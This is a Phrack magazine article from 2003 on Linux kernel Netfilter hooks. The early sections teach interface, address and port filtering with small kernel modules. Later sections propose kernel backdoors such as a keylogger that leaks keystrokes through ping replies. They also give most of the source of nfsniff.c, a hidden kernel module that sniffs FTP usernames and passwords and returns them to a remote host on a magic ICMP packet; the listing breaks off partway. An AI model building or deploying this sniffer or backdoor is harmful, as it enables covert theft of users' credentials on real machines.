[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]

..[ Phrack Magazine ]..
.:: Hacking the Linux Kernel Network Stack ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ] [ 69 ] [ 70 ]
Current issue : #61 | Release date : 2003-08-13 | Editor : Phrack Staff
IntroductionPhrack Staff
LoopbackPhrack Staff
LinenoisePhrack Staff
Toolz ArmoryPhrack Staff
Phrack Prophile on digitPhrack Staff
Advanced Doug Lea's malloc exploitsjp
Hijacking Linux Page Fault Handlerbuffer
The Cerberus ELF interfacemayhem
Polymorphic Shellcode EngineCLET team
Infecting Loadable Kernel Modulestruff
Building IA32 'Unicode-Proof' Shellcodesobscou
Fun with the Spanning Tree ProtocolVladislav V. Myasnyankin & Oleg K. Artemjev
Hacking the Linux Kernel Network Stackbioforge
Kernel Rootkit Experiences & the Futurestealth
Phrack World NewsPhrack Staff
Title : Hacking the Linux Kernel Network Stack
Author : bioforge
                           ==Phrack Inc.==

              Volume 0x0b, Issue 0x3d, Phile #0x0d of 0x0f

|=------------=[ Hacking the Linux Kernel Network Stack ]=---------------=|
|=------------------=[ bioforge <alkerr@yifan.net> ]=--------------------=|

Table of Contents

1 - Introduction
  1.1 - What this document is
  1.2 - What this document is not
2 - The various Netfilter hooks and their uses
  2.1 - The Linux kernel's handling of packets
  2.2 - The Netfilter hooks for IPv4
3 - Registering and unregistering Netfilter hooks
4 - Packet filtering operations with Netfilter
  4.1 - A closer look at hook functions
  4.2 - Filtering by interface
  4.3 - Filtering by address
  4.4 - Filtering by TCP port
5 - Other possibilities for Netfilter hooks
  5.1 - Hidden backdoor daemons
  5.2 - Kernel based FTP password sniffer
    5.2.1 - The code... nfsniff.c
    5.2.2 - getpass.c
6 - Hiding network traffic from Libpcap
  6.1 - SOCK_PACKET, SOCK_RAW and Libpcap
  6.2 - Wrapping the cloak around the dagger
7 - Conclusion
A - Light-Weight Fire Wall
  A.1 - Overview
  A.2 - The source... lwfw.c
  A.3 - lwfw.h
B - Code for section 6

--[ 1 - Introduction

This article  describes  how  quirks (not necessarily  weaknesses)  in the
Linux network stack can be used for various purposes, nefarious or otherw-
ise.  Presented here will be a  discussion on using  seemingly  legitimate
Netfilter hooks for backdoor communications and also a technique to hide
such traffic from a Libpcap based sniffer running on the local machine.

Netfilter  is  a   subsystem  in the Linux 2.4  kernel.   Netfilter  makes
such  network  tricks as  packet  filtering,  network address  translation
(NAT) and connection tracking possible through the use of various hooks in
the kernel's network code. These hooks are places that kernel code, either
statically  built  or  in  the form  of a loadable  module,  can  register
functions to be called for specific  network events. An example of such an
event is the reception of a packet.

----[ 1.1 - What this document is

This document discusses  how a module writer can make use of the Netfilter
hooks  for whatever  purposes and also how  network traffic  can be hidden
from a Libpcap application.  Although  Linux 2.4 supports  hooks for IPv4,
IPv6 and DECnet,  only IPv4 will be discussed  in this document.  However,
most of the IPv4 content can be applied to the other protocols. As an aide
to teaching, a working kernel module that  provides basic packet filtering
is provided in Appendix A.  Any  development/experimentation done for this
document  was done on an  Intel machine running  Linux 2.4.5.  Testing the
behaviour  of  Netfilter  hooks was done  using  the  loopback device,  an
Ethernet device and a modem Point-to-Point interface.

This  document  is also  written for  my benefit  in an  attempt  to  fully
understand Netfilter.  I do not guarantee that  any code  accompanying this
document is 100% error free  but I have  tested all  code provided here.  I
have suffered  the kernel  faults so hopefully  you won't have to.  Also, I
do  not  accept any  responsibility  for  damages  that may  occur  through
following this document. It is expected that the reader be comfortable with
the C   programming language and have some experience with  Loadable Kernel

If I have  made a mistake in something presented here then please let me
know. I am also open to suggestions on either improving this document or
other nifty Netfilter tricks in general.

----[ 1.2 - What this document is not

This document is not a complete ins-and-outs reference for Netfilter. It
is also *not* a reference for the iptables command. If you want to learn
more about the iptables command, consult the man pages.

So let's get started with an introduction to using Netfilter...

--[ 2 - The various Netfilter hooks and their uses
----[ 2.1 - The Linux kernel's handling of packets

As much as I would love to go into the gory details of Linux's handling of
packets  and the events  preceeding  and following  each Netfilter hook, I
won't. The simple  reason is that  Harald Welte has already written a nice
document  on  the subject,  his Journey  of a Packet Through the Linux 2.4
Network Stack  document. To learn  more on Linux's  handling of packets, I
strongly  suggest  that  you  read this  document  as well.  For now, just
understand that as a packet moves through the Linux kernel's network stack
it crosses  several hook  locations where packets can be analysed and kept
or discarded. These are the Netfilter hooks.

------[ 2.2 The Netfilter hooks for IPv4

Netfilter defines five hooks for IPv4.  The declaration of the symbols for
these can be  found in  linux/netfilter_ipv4.h.  These hooks are displayed
in the table below:

Table 1: Available IPv4 hooks

   Hook                 Called
NF_IP_PRE_ROUTING   After sanity checks, before routing decisions.
NF_IP_LOCAL_IN      After routing decisions if packet is for this host.
NF_IP_FORWARD       If the packet is destined for another interface.
NF_IP_LOCAL_OUT     For packets coming from local processes on
		    their way out.
NF_IP_POST_ROUTING  Just before outbound packets "hit the wire".

The  NF_IP_PRE_ROUTING  hook  is called  as the first  hook after a packet
has been received.  This is the hook that the module presented later  will
utilise. Yes the other hooks are  very  useful  as  well, but  for now  we
will  focus  only on NF_IP_PRE_ROUTING.

After hook  functions have done  whatever  processing they need to do with
a packet they must  return one of the  predefined  Netfilter return codes.
These codes are:

Table 2: Netfilter return codes
Return Code          Meaning
  NF_DROP        Discard the packet.
  NF_ACCEPT      Keep the packet.
  NF_STOLEN      Forget about the packet.
  NF_QUEUE       Queue packet for userspace.
  NF_REPEAT      Call this hook function again.

The   NF_DROP  return  code  means  that  this  packet  should  be  dropped
completely  and  any  resources  allocated  for  it  should  be   released.
NF_ACCEPT tells Netfilter  that so far the  packet is  still acceptable and
that it  should move to the  next stage of the network stack.  NF_STOLEN is
an interesting one because it tells Netfilter to "forget" about the packet.
What this  tells Netfilter is  that the hook  function will take processing
of this packet from  here and that Netfilter  should drop all processing of
it.  This does  not  mean,  however, that  resources  for  the  packet  are
released. The packet and it's respective sk_buff structure are still valid,
it's just that  the hook  function has  taken  ownership of the packet away
from  Netfilter.  Unfortunately  I'm  not  exactly  clear on  what NF_QUEUE
really  does  so  for  now  I won't  discuss  it.  The  last return  value,
NF_REPEAT requests that Netfilter calls the hook  function again. Obviously
one must be careful using NF_REPEAT so as to avoid an endless loop.

--[ 3 - Registering and unregistering Netfilter hooks

Registration of a  hook  function is a very  simple  process  that revolves
around  the  nf_hook_ops   structure,  defined  in  linux/netfilter.h.  The
definition of this structure is as follows:

          struct nf_hook_ops {
                  struct list_head list;

                  /* User fills in from here down. */
                  nf_hookfn *hook;
                  int pf;
                  int hooknum;
                  /* Hooks are ordered in ascending priority. */
                  int priority;

The  list  member of  this  structure is  used to  maintain  the  lists  of
Netfilter hooks and has no importance for hook registration as far as users
are concerned.  hook is a  pointer to a  nf_hookfn  function.  This is  the
function  that will be  called  for  the  hook.  nf_hookfn  is  defined  in
linux/netfilter.h as well. The pf field specifies a protocol family.  Valid
protocol families are available from linux/socket.h but for IPv4 we want to
use PF_INET.  The  hooknum  field specifies the  particular hook to install
this function  for and is one of the values listed in table 1. Finally, the
priority field specifies where in the order of execution this hook function
should   be   placed.   For  IPv4,   acceptable  values   are   defined  in 
linux/netfilter_ipv4.h  in the  nf_ip_hook_priorities  enumeration. For the
purposes of demonstration modules we will be using NF_IP_PRI_FIRST.

Registration  of a  Netfilter hook  requires using a  nf_hook_ops structure
with the nf_register_hook() function. nf_register_hook() takes the  address
of an nf_hook_ops structure and returns an integer value.  However, if  you
actually   look  at   the  code   for  the  nf_register_hook()  function in
net/core/netfilter.c, you will notice that it only ever returns a  value of
zero. Provided below is example code that simply registers a function  that
will drop all  packets that  come  in.  This code  will also  show  how the
Netfilter return values are interpreted.

Listing 1. Registration of a Netfilter hook
/* Sample code to install a Netfilter hook function that will
 * drop all incoming packets. */

#define __KERNEL__
#define MODULE

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>

/* This is the structure we shall use to register our function */
static struct nf_hook_ops nfho;

/* This is the hook function itself */
unsigned int hook_func(unsigned int hooknum,
                       struct sk_buff **skb,
                       const struct net_device *in,
                       const struct net_device *out,
                       int (*okfn)(struct sk_buff *))
    return NF_DROP;           /* Drop ALL packets */

/* Initialisation routine */
int init_module()
    /* Fill in our hook structure */
    nfho.hook = hook_func;         /* Handler function */
    nfho.hooknum  = NF_IP_PRE_ROUTING; /* First hook for IPv4 */
    nfho.pf       = PF_INET;
    nfho.priority = NF_IP_PRI_FIRST;   /* Make our function first */

    return 0;
/* Cleanup routine */
void cleanup_module()

That's all there is to it.  From the code given in listing 1 you can  see
that  unregistering  a  Netfilter  hook is a  simple  matter  of  calling
nf_unregister_hook() with  the address of the same structure  you used to
register the hook.

--[ 4 - Basic packet filtering techniques with Netfilter
----[ 4.1 - A closer look at hook functions

Now  its  time to  start looking  at what  data gets  passed  into  hook
functions  and how that data  an be used to make filtering decisions. So
let's look more  closely at  the prototype  for nf_hookfn functions. The
prototype is given in linux/netfilter.h as follows:

	  typedef unsigned int nf_hookfn(unsigned int hooknum,
                                         struct sk_buff **skb,
                                         const struct net_device *in,
                                         const struct net_device *out,
                                         int (*okfn)(struct sk_buff *));

The first argument to  nf_hookfn  functions  is a value specifying one of
the hook types given in table 1. The second argument is more interesting.
It is a pointer to a pointer to a  sk_buff  structure, the structure used
by  the network  stack to describe packets.  This structure is defined in
linux/skbuff.h  and due to its  size, I shall only highlight some of it's
more interesting fields here.

Possibly the  most useful fields out of  sk_buff structures are the three
unions that describe the transport header (ie. UDP, TCP, ICMP, SPX),  the
network header (ie. IPv4/6, IPX, RAW) and the link layer header (Ethernet
or RAW). The names of these unions are h, nh and mac respectively.  These
unions contain several structures, depending on what protocols are in use
in a  particular packet.  One should note that  the transport  header and
network header may very well point to the same  location in memory.  This
is  the  case for TCP packets where  h  and  nh  are both  considered  as
pointers  to IP header structures.  This means  that attempting  to get a
value from h->th thinking it's pointing to the TCP header will  result in
false results because h->th will actually be pointing to the  IP  header,
just like nh->iph.

Other  fields of  immediate  interest are the  len and  data fields.  len
specifies the total length of the packet data beginning at data.  So  now
we know how to access  individual protocol  headers and  the  packet data
itself  from  a   sk_buff  structure.   What other  interesting  bits  of
information are available to Netfilter hook functions? 

The  two  arguments  that  come  after   skb   are pointers to net_device
structures.   net_device  structures are  what the  Linux  kernel uses to
describe network interfaces of all sorts.  The first of these structures,
in,  is  used  to  describe the  interface the  packet  arrived on.   Not
surprisingly, the  out  structure  describes  the interface the packet is
leaving on.  It is  important to  realise that  usually only one of these
structures will be provided.  For instance, in will only be provided  for
the NF_IP_PRE_ROUTING and NF_IP_LOCAL_IN hooks. out will only be provided
for the  NF_IP_LOCAL_OUT  and  NF_IP_POST_ROUTING  hooks. At this stage I
haven't  tested  which  of  these  structures  are   available   for  the
NF_IP_FORWARD hook but if you make sure the pointers  are non-NULL before
attempting to  dereference  them you  should be fine.

Finally,  the last item passed into a hook function is a function pointer
called  okfn  that takes a  sk_buff  structure as  its only  argument and
returns an integer. I'm not too sure on what this function does.  Looking
in  net/core/netfilter.c  there are two places where this okfn is called.
These  two places are  in the functions  nf_hook_slow() and nf_reinject()
where at a  certain place this  function is called on a  return value  of
NF_ACCEPT from a Netfilter hook. If anybody has more information on  okfn
please let me know.

Now that we've looked at the most interesting and useful bits of informa-
tion that our hook functions receive, it's time to look at how we can use
that information to filter packets in a variety of ways.

----[ 4.2 - Filtering by interface

This  would have to  be  the  simplest  filtering  technique  we  can do.
Remember those net_device structures  our hook  function received?  Using
the name field from the relevant  net_device  structure allows us to drop
packets depending on their source interface or destination  interface. To
drop all packets that  arrive  on interface  eth0 all  one has  to  do is
compare the value of  in->name  with "eth0".  If the names match then the
hook function simply returns NF_DROP and the packet is destroyed. It's as
easy as that. Sample code to do this is provided in listing 2 below. Note
that the Light-Weight FireWall module will  provide  simple  examples  of
all the  filtering  methods  presented here.  It also  includes an  IOCTL
interface and application to change its behaviour dynamically.

Listing 2. Filtering packets based on their source interface

/* Sample code to install a Netfilter hook function that will
 * drop all incoming packets on an interface we specify */
 #define __KERNEL__
 #define MODULE
 #include <linux/module.h>
 #include <linux/kernel.h>
 #include <linux/netdevice.h>
 #include <linux/netfilter.h>
 #include <linux/netfilter_ipv4.h>
 /* This is the structure we shall use to register our function */
  static struct nf_hook_ops nfho;

 /* Name of the interface we want to drop packets from */
  static char *drop_if = "lo";

 /* This is the hook function itself */
  unsigned int hook_func(unsigned int hooknum,
                         struct sk_buff **skb,
                         const struct net_device *in,
                         const struct net_device *out,
                         int (*okfn)(struct sk_buff *))
    if (strcmp(in->name, drop_if) == 0) {
        printk("Dropped packet on %s...\n", drop_if);
        return NF_DROP;
    } else {
        return NF_ACCEPT;

/* Initialisation routine */
int init_module()
    /* Fill in our hook structure */
    nfho.hook     = hook_func;         /* Handler function */
    nfho.hooknum  = NF_IP_PRE_ROUTING; /* First hook for IPv4 */
    nfho.pf       = PF_INET;
    nfho.priority = NF_IP_PRI_FIRST;   /* Make our function first */
    return 0;
/* Cleanup routine */
void cleanup_module()

Now isn't that simple? Next, let's have a look at filtering based on IP

----[ 4.3 - Filtering by address

As with filtering packets by their interface, filtering packets by their
source  or  destination  IP address  is very  simple.  This  time we are
interested in the sk_buff structure. Now remember that the  skb argument
is a pointer to a pointer to a sk_buff structure.  To avoid running into
problems it is good practice to declare a seperate pointer to a  sk_buff
structure  and assign the value pointed to by skb to this newly declared
pointer. Like so:

      struct sk_buff *sb = *skb;    /* Remove 1 level of indirection* /

Now you  only have to  dereference once  to access  items in the structure.
Obtaining the IP header for a packet is done using the network layer header
from the the sk_buff structure. This header is contained in a union and can
be accessed as sk_buff->nh.iph. The function in listing 3  demonstrates how
to check the source IP address  of a received packet  against an address to
deny  when given a  sk_buff  for the  packet.  This  code has  been  pulled
directly  from  LWFW.  The  only  difference  is that  the update  of  LWFW
statistics has been removed.

Listing 3. Checking source IP of a received packet

 	  unsigned char *deny_ip = "\x7f\x00\x00\x01";  /* */

          static int check_ip_packet(struct sk_buff *skb)
              /* We don't want any NULL pointers in the chain to
	       * the IP header. */
              if (!skb )return NF_ACCEPT;
              if (!(skb->nh.iph)) return NF_ACCEPT;
              if (skb->nh.iph->saddr == *(unsigned int *)deny_ip) { 
	          return NF_DROP;

              return NF_ACCEPT;

Now if the source address matches the address we want to drop packets from
then the  packet is  dropped.  For this  function to work as presented the
value of  deny_ip  should be  stored  in  Network Byte Order  (Big-endian,
opposite of Intel).  Although  it's  unlikely that  this  function will be
called  with a  NULL pointer  for it's  argument,  it never  hurts to be a
little paranoid.  Of course if an  error does occur then the function will
return NF_ACCEPT so that  Netfilter  can continue  processing  the packet.
Listing 4 presents the simple module  used to  demonstrate interface based
filtering  changed so  that it drops packets that  match a  particular  IP

Listing 4. Filtering packets based on their source address
          /* Sample code to install a Netfilter hook function that will
          * drop all incoming packets from an IP address we specify */

          #define __KERNEL__
          #define MODULE

          #include <linux/module.h>
          #include <linux/kernel.h>
          #include <linux/skbuff.h>
          #include <linux/ip.h>                  /* For IP header */
          #include <linux/netfilter.h>
          #include <linux/netfilter_ipv4.h>

          /* This is the structure we shall use to register our function */
          static struct nf_hook_ops nfho;

          /* IP address we want to drop packets from, in NB order */
          static unsigned char *drop_ip = "\x7f\x00\x00\x01";

          /* This is the hook function itself */
          unsigned int hook_func(unsigned int hooknum,
                                 struct sk_buff **skb,
                                 const struct net_device *in,
                                 const struct net_device *out,
                                 int (*okfn)(struct sk_buff *))
              struct sk_buff *sb = *skb;

              if (sb->nh.iph->saddr == drop_ip) {
                  printk("Dropped packet from... %d.%d.%d.%d\n",
		  	  *drop_ip, *(drop_ip + 1),
			  *(drop_ip + 2), *(drop_ip + 3));
                  return NF_DROP;
              } else {
                  return NF_ACCEPT;

          /* Initialisation routine */
          int init_module()
              /* Fill in our hook structure */
              nfho.hook     = hook_func;
              /* Handler function */
              nfho.hooknum  = NF_IP_PRE_ROUTING; /* First for IPv4 */
              nfho.pf       = PF_INET;
              nfho.priority = NF_IP_PRI_FIRST;   /* Make our func first */

              return 0;
	  /* Cleanup routine */
          void cleanup_module()

----[ 4.4 - Filtering by TCP port

Another simple  rule to  implement is the  filtering of  packets based on
their TCP destination port.  This is only a bit more fiddly than checking
IP addresses because  we need  to  create  a  pointer  to  the TCP header
ourselves.  Remember what was discussed earlier about  transport  headers
and  network  headers?  Getting a pointer  to the TCP header  is a simple
matter of allocating a pointer to a struct tcphdr (define in linux/tcp.h)
and  pointing after the IP header in our packet data.  Perhaps an example
would help.  Listing 5 presents code to check if the destination TCP port
of a packet matches some  port we want to drop all  packets for.  As with
listing 3, this was taken from LWFW.

Listing 5. Checking the TCP destination port of a received packet
          unsigned char *deny_port = "\x00\x19";   /* port 25 */


          static int check_tcp_packet(struct sk_buff *skb)
              struct tcphdr *thead;

              /* We don't want any NULL pointers in the chain
	       * to the IP header. */
              if (!skb ) return NF_ACCEPT;
              if (!(skb->nh.iph)) return NF_ACCEPT;

              /* Be sure this is a TCP packet first */
              if (skb->nh.iph->protocol != IPPROTO_TCP) {
                  return NF_ACCEPT;

              thead = (struct tcphdr *)(skb->data +
                                       (skb->nh.iph->ihl * 4));

              /* Now check the destination port */
              if ((thead->dest) == *(unsigned short *)deny_port) {
                  return NF_DROP;
	      return NF_ACCEPT;

Very simple indeed. Don't forget that for this function to work deny_port
should be in network byte order.  That's it for packet filtering  basics,
you should have a fair understanding of how to get to the information you
want for a specific packet.  Now it's time to move onto more  interesting

--[ 5 - Other possibilities for Netfilter hooks

Here I'll  make some  proposals for  other cool stuff to do with Netfilter
hooks. Section 5.1 will simply provide food for thought, while section 5.2
shall  discuss and  provide working code for a kernel based  FTP  password
sniffer with  remote password  retrieval that really does work. It fact it
works so well it scares me, and I wrote it.

----[ 5.1 - Hidden backdoor daemons

Kernel module  programming would have  to be one  of the  most interesting
areas of development for Linux.  Writing code in the kernel means  you are
writing code in a place  where you are  limited only by  your imagination.
From a malicous point of  view you can  hide files,  processes, and do all
sorts of cool things that  any  rootkit worth its salt is capable of. Then
from a not-so-malicious point of view (yes people  with this point of view
do exist) you can hide  files,  processes and do all sorts of cool things.
The kernel really is a fascinating place.

Now with all the power made available to a kernel level  programmer, there
are  a lot of possibilities.  Possibly one  of the most  interesting  (and
scary for  system  administrators) is  the possibility of backdoors  built
right into the kernel.  Afterall, if a  backdoor doesn't  run as a process
then how do you know it's running? Of course there are ways of making your
kernel  cough-up  such backdoors,  but they are by  no means  as easy  and
simple as running ps.  Now the idea of putting backdoor code into a kernel
is not new.  What I'm proposing  here, however, is placing  simple network
services as kernel backdoors using, you guessed it, Netfilter hooks.

If  you have the  necessary skills and willingness to crash your kernel in
the name of experimentation,  then you can  construct  simple  but  useful
network services located  entirely in the  kernel and accessible remotely.
Basically a  Netfilter  hook could  watch incoming  packets  for a "magic"
packet  and  when  that magic packet  is received,  do something  special.
Results can then be sent from the Netfilter hook and the hook function can
return NF_STOLEN so that the received "magic" packet goes no further. Note
however, that when sending in such a fassion, outgoing packets will  still
be visible on the outbound Netfilter hooks. Therefore userspace is totally
unaware  that  the magic  packet  ever  arrived, but they  can  still  see
whatever you send out. Beware! Just because a sniffer on a compromised host
can't see the packet, doesn't mean that a sniffer  on an intermediate host
can't see the packet.

kossak  and  lifeline wrote an excellent article for Phrack describing how
such things could  be done by registering  packet  type handlers. Although
this document deals with  Netfilter  hooks I still  suggest reading  their
article  (Issue 55, file 12)  as it is a very  interesting  read with some
very interesting ideas being presented.

So what kind of work  could a  backdoor  Netfilter hook do? Well, here are
some suggestions:
  -- Remote access key-logger. Module logs keystrokes and results are
     sent to a remote host when that host sends a PING request. So a
     stream of keystroke information could be made to look like a steady
     (don't flood) stream of PING replies. Of course one would want to
     implement a simple encryption so that ASCII keys don't show
     themselves immediately and some alert system administrator goes
     "Hang on. I typed that over my SSH session before! Oh $%@T%&!".
  -- Various simple administration tasks such as getting lists of who is
     currently logged onto the machine or obtaining information about
     open network connections.
  -- Not really a backdoor as such, but a module that sits on a network
     perimeter and blocks any traffic suspected to come from trojans,
     ICMP covert channels or file sharing tools like KaZaa.
  -- File transfer "server". I have implemented this idea recently. The
     resulting LKM is hours of fun :).
  -- Packet bouncer. Redirects packets aimed at a special port on the
     backdoored host to another IP host and port and sends packets from
     that host back to the initiator. No process being spawned and best of
     all, no network socket being opened.
  -- Packet bouncer as described above used to communicate with critical
     systems on a network in a semi-covert manner. Eg. configuring routers
     and such.
  -- FTP/POP3/Telnet password sniffer. Sniff outgoing passwords and save
     the information until a magic packet comes in asking for it.

Well that's a short list of ideas.  The last one will actually  be discussed
in more detail in the next section as it provides a nice oppurtunity to look
at some more functions internal to the kernel's network code.

----[ 5.2 - Kernel based FTP password sniffer

Presented here is a simple proof-of-concept module that acts as a Netfilter
backdoor. This module will sniff  outgoing FTP packets  looking for a  USER
and  PASS command pair for an FTP server.  When a pair is  found the module
will then wait for  a "magic" ICMP ECHO (Ping) packet big  enough to return
the server's IP  address and the username and password.  Also provided is a
quick hack that sends a magic packet, gets a reply then prints the returned
information. Once a username/password pair has been read from the module it
will then look for the next pair. Note that only one pair will be stored by
the module at one time.  Now that a brief overview  has been provided, it's
time to present a more detailed look at how the module does its thing.

When loaded,  the module's  init_module()  function  simply  registers  two
Netfilter  hooks.  The  first  one is used  to watch  incoming  traffic (on
NF_IP_PRE_ROUTING)  in an attempt  to find a "magic" ICMP packet.  The next
one is used  to watch  traffic leaving the machine  (on NF_IP_POST_ROUTING)
the  module is installed on.  This is where the search  and capture of  FTP
USER  and  PASS  packets happens.  The  cleanup_module()  procedure  simply
unregisters these two hooks.

watch_out()  is the  function used to hook  NF_IP_POST_ROUTING.  Looking at
this  function  you can see  that it is very  simple  in operation.  When a
packet enters the function it is run through various checks to be sure it's
an  FTP  packet.  If it's not  then a  value  of   NF_ACCEPT   is  returned
immediately.  If it is an FTP packet then the module checks to be sure that
it doesn't already have a username and password pair already queued.  If it
does (as signalled by have_pair being non-zero) then  NF_ACCEPT is returned
and the packet can  finally leave the system.  Otherwise,  the  check_ftp()
procedure is called.  This is where  extraction of passwords actually takes
place.  If no previous packets  have been received then the  target_ip  and
target_port variables should be cleared.

check_ftp()  starts by looking for either  "USER",  "PASS" or "QUIT" at the
beginning of the packet.  Note that  PASS commands  will not  be  processed
until a USER command has been processed. This prevents deadlock that occurs
if for  some reason  a PASS command  is received first  and the  connection
breaks before  USER arrives.  Also, if a  QUIT  command arrives  and only a
username has been captured then things are reset so sniffing can start over
on a new connection. When a USER or PASS command arrives, if the  necessary
sanity checks are passed then the argument  to the command  is copied. Just
before check_ftp() finishes under normal operations, it checks to see if it
now has a valid username and password string. If it does then  have_pair is
set and no more  usernames or  passwords will be grabbed  until the current
pair is retrieved.

So far you have seen how this module installs itself and begins looking for
usernames  and passwords  to log.  Now you  shall see what happens when the
specially  formatted "magic" packet arrives.  Pay particular attention here
because this is where the most problems arose during development. 16 kernel
faults if I remember correctly :).  When packets come into the machine with
this module installed, watch_in() checks each one  to see if it is a  magic
packet.  If it does not pass  the necessary  requirements to be  considered
magic,  then  the  packet  is  ignored by  watch_in()  who  simply  returns
NF_ACCEPT.  Notice how one of the  criteria for  magic packets is that they
have enough room  to hold the IP address and username and password strings.
This is done to make sending the reply easier.  A fresh sk_buff  could have
been allocated,  but getting  all of the  necessary  fields  right  can  be
difficult  and you  have to  get them right!  So instead of  creating a new
structure for  our reply  packet, we  simply  tweak  the  request  packet's
structure.  To  return the  packet successfully, several changes need to be
made.  Firstly, the  IP addresses  are swapped  around and  the packet type
field of the  sk_buff  structure (pkt_type)  is changed to  PACKET_OUTGOING
which is defined in  linux/if_packet.h.  The next thing to take  care of is
making sure any link  layer  headers are included.  The data  field of  our
received packet's sk_buff points after the  link layer header and it is the
data field that points to the beginning of  packet data to be  transmitted.
So for interfaces that require the link layer header (Ethernet and Loopback
Point-to-Point is raw) we  point the  data field  to the  mac.ethernet  or
mac.raw structures. To determine what type of interface this packet came in
on, you can check  the value of  sb->dev->type  where  sb is a pointer to a
sk_buff  structure.   Valid  values  for  this   field   can  be  found  in
linux/if_arp.h but the most useful are given below in table 3.

Table 3: Common values for interface types

Type Code        Interface Type
ARPHRD_ETHER     Ethernet
ARPHRD_LOOPBACK  Loopback device
ARPHRD_PPP       Point-to-point (eg. dialup)

The last thing to be done is actually copy the data we want to send in our
reply.  It's now time to send the packet.  The  dev_queue_xmit()  function
takes a pointer to a sk_buff structure as it's only argument and returns a
negative errno  code on a nice  failure.  What do I  mean by nice failure?
Well, if you give dev_queue_xmit() a badly constructed socket buffer  then
you will get a  not-so-nice  failure.  One that comes complete with kernel
fault and kernel stack dump information. See how failures can be splt into
two groups here? Finally, watch_in() returns  NF_STOLEN to tell  Netfilter
to forget it ever saw the packet (bit of a Jedi Mind Trick). Do NOT return
NF_DROP  if you have  called  dev_queue_xmit()!  If you do  then you  will
quickly get a nasty kernel fault.  This is because  dev_queue_xmit()  will
free the passed in socket buffer and Netfilter will attempt to do the same
with an NF_DROPped packet. Well that's enough discussion on the code, it's
now time to actually see the code.

------[ 5.2.1 - The code... nfsniff.c

<++> nfsniff/nfsniff.c
/* Simple proof-of-concept for kernel-based FTP password sniffer.
 * A captured Username and Password pair are sent to a remote host
 * when that host sends a specially formatted ICMP packet. Here we
 * shall use an ICMP_ECHO packet whose code field is set to 0x5B
 * *AND* the packet has enough
 * space after the headers to fit a 4-byte IP address and the
 * username and password fields which are a max. of 15 characters
 * each plus a NULL byte. So a total ICMP payload size of 36 bytes. */

 /* Written by bioforge,  March 2003 */

#define MODULE
#define __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/skbuff.h>
#include <linux/in.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/icmp.h>
#include <linux/netdevice.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/if_arp.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>

#define MAGIC_CODE   0x5B
#define REPLY_SIZE   36

#define ICMP_PAYLOAD_SIZE  (htons(sb->nh.iph->tot_len) \
			       - sizeof(struct iphdr) \
			       - sizeof(struct icmphdr))

/* THESE values are used to keep the USERname and PASSword until
 * they are queried. Only one USER/PASS pair will be held at one
 * time and will be cleared once queried. */
static char *username = NULL;
static char *password = NULL;
static int  have_pair = 0;	 /* Marks if we already have a pair */

/* Tracking information. Only log USER and PASS commands that go to the
 * same IP address and TCP port. */
static unsigned int target_ip = 0;
static unsigned short target_port = 0;

/* Used to describe our Netfilter hooks */
struct nf_hook_ops  pre_hook;	       /* Incoming */
struct nf_hook_ops  post_hook;	       /* Outgoing */

/* Function that looks at an sk_buff that is known to be an FTP packet.
 * Looks for the USER and PASS fields and makes sure they both come from
 * the one host as indicated in the target_xxx fields */
static void check_ftp(struct sk_buff *skb)
   struct tcphdr *tcp;
   char *data;
   int len = 0;
   int i = 0;
   tcp = (struct tcphdr *)(skb->data + (skb->nh.iph->ihl * 4));
   data = (char *)((int)tcp + (int)(tcp->doff * 4));

   /* Now, if we have a username already, then we have a target_ip.
    * Make sure that this packet is destined for the same host. */
   if (username)
     if (skb->nh.iph->daddr != target_ip || tcp->source != target_port)
   /* Now try to see if this is a USER or PASS packet */
   if (strncmp(data, "USER ", 5) == 0) {          /* Username */
      data += 5;
      if (username)  return;
      while (*(data + i) != '\r' && *(data + i) != '\n'
	     && *(data + i) != '\0' && i < 15) {
      if ((username = kmalloc(len + 2, GFP_KERNEL)) == NULL)
      memset(username, 0x00, len + 2);
      memcpy(username, data, len);
      *(username + len) = '\0';	       /* NULL terminate */
   } else if (strncmp(data, "PASS ", 5) == 0) {   /* Password */
      data += 5;

      /* If a username hasn't been logged yet then don't try logging
       * a password */
      if (username == NULL) return;
      if (password)  return;
      while (*(data + i) != '\r' && *(data + i) != '\n'
	     && *(data + i) != '\0' && i < 15) {

      if ((password = kmalloc(len + 2, GFP_KERNEL)) == NULL)
      memset(password, 0x00, len + 2);
      memcpy(password, data, len);
      *(password + len) = '\0';	       /* NULL terminate */
   } else if (strncmp(data, "QUIT", 4) == 0) {
      /* Quit command received. If we have a username but no password,
       * clear the username and reset everything */
      if (have_pair)  return;
      if (username && !password) {
	 username = NULL;
	 target_port = target_ip = 0;
	 have_pair = 0;
   } else {

   if (!target_ip)
     target_ip = skb->nh.iph->daddr;
   if (!target_port)
     target_port = tcp->source;

   if (username && password)
     have_pair++;		       /* Have a pair. Ignore others until
					* this pair has been read. */
//   if (have_pair)
//     printk("Have password pair!  U: %s   P: %s\n", username, password);

/* Function called as the POST_ROUTING (last) hook. It will check for
 * FTP traffic then search that traffic for USER and PASS commands. */
static unsigned int watch_out(unsigned int hooknum,
			      struct sk_buff **skb,
			      const struct net_device *in,
			      const struct net_device *out,
			      int (*okfn)(struct sk_buff *))
   struct sk_buff *sb = *skb;
